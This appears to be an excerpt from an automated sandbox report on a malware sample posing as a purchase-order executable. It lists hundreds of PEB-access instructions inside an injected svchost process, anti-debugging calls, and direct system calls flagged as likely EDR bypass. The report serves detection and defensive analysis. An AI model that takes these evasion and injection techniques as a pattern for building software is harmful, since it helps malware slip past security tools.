            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]2_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]2_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]2_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]2_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]2_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]2_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]2_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]2_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]2_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]2_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]2_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]2_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]2_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]2_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]2_2_032FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]2_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]2_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]2_2_0325E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]2_2_0325EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]2_2_032E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h]2_2_03232F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CF1F mov eax, dword ptr fs:[00000030h]2_2_0326CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325AF69 mov eax, dword ptr fs:[00000030h]2_2_0325AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325AF69 mov eax, dword ptr fs:[00000030h]2_2_0325AF69
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
